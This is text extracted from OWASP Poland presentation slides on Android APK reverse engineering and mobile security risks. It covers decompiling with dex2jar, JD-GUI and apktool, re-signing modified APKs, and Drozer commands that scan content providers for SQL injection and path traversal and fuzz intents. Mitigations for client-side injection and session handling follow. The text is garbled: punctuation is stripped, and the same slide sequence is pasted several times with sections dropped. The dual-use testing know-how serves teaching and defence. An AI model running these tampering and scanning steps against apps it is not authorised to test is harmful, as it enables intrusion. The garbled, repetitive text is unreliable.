Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
